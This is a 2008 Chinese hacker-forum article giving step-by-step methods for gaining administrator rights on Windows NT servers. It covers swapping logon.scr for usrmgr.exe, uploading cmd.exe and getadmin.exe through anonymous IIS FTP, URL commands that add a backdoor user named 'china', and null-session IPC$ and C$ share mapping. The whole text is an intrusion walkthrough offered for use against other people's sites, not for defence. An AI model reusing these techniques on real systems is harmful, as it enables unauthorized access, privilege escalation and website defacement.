| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 |

您现在的位置： 中国X黑客小组 >> 技术文章 >> 黑客技术 >> 入侵检测 >> 文章正文 用户登录 新用户注册

nt下使用匿名获得admin权限的几个方法           ★★★ 【字体：小 大】
nt下使用匿名获得admin权限的几个方法
作者：佚名    文章来源：Yes黑客联盟    点击数：    更新时间：2008-6-16
之一  如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:  先把c:winntsystem32下的logon.scr改名为logon.old备份  然后把usrmgr.exe改名为logon.scr  然后重新启动  logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界  面,而是用户管理器  这时他就有权限把自己加到Administrator组  不要忘记把文件名改回来啊!  之二:  下面的技术适用于不重视NT网络安全的网站,虽然要靠运气,但是人多力量大  一些 http的技术也可以供较高级的人员参考  作为初学者,进入NT网络可以采取下面的步骤:  因为NT的IIS server的ftp一般都是允许anonymous匿名帐号进入的,有些anonymous  的帐号还有upload权限,我们就要攻击这类站点。因为如果不允许匿名帐号,就可能  造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较  高级的技术。  正因为允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用  ftp登陆一个NT server,比如:www.xxx.com(示例名):  ftp www.xxx.com  Connected to www.xxx.com  220 ntsvr2 Microsoft FTP Service (Version 3.0).  ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSER_ntsvr2  的用户帐号,属于Domain user组，这个帐号我们以后要用来获取Administrator的权限  User (www.xxx.com:(none)):anonymous  331 Anonymous access allowed, send identity (e-mail name) as password.  Password: 输入 guest@ 或者guest  对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。  那么guest帐号就是一个可用的正确的用户帐号，虽然只属于Domain guest组  在这种情况下我们就可以进NT server的ftp了。  进去以后,试试 cd /c ,如果运气好,改变目录成功，这时你就有了80%的把握。  现在,开始查找cgi-bin目录(或者scripts目录),进去以后,  把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin  然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_SATURN  大约十多秒后屏幕显示:  CGI Error  这时有90%的可能是:你已经把IUSER_ntsvr2升级为Administrator,也就是任何访问该web  站的人都是管理员  下面可以add user:  http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32net.exe%20user%20  china%20news%20/add  这样就创建了一个叫china用户,密码是news,然后:  http://www.xxx.com/cgi-bin/getadmin.exe?cnn  你再用cnn的帐号登陆,就可以改web根目录的主页了,也可以用上面的cmd.exe的方法直  接修改  之三:  用NT的Netbios技术扫描  nbtstat -a www.xxx.com  或者  nbtstat -A www.xxx.com  这样可以得到其域的共享资源名称  net view \www.xxx.com  可以获得其机器的共享资源名称,如果有c盘  net use f: \www.xxx.com\c$Content$nbsp; 可以用f:映射其c盘  net use \111.111.111.111\ipc$Content$nbsp;"" /user:""  之四: Unix下移植过来的工具:  Windows95&98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包:  WinDump95.exe 使用前还要下载这个库 Packet95.exe  WindowsNT用户的版本  WinDump.exe　PacketNT.exe
文章录入：血腥魔术师    责任编辑：血腥魔术师
	上一篇文章： 完整的XSS wrom网站入侵实例 下一篇文章： Tomcat弱口令到入侵服务器
【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

最新热点		最新推荐		相关文章
				恢复IE7的FTP视图模式

网友评论：（只显示最新5条。评论内容只代表网友观点，与本站立场无关！）

关于我们 - 版权声明 - 帮助(？) - 广告服务 - 联系我们 - 友情链接 - 用户注册 -	Powered by ICE RIVER - STUDIO

» CnXHacker.CoM

© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved.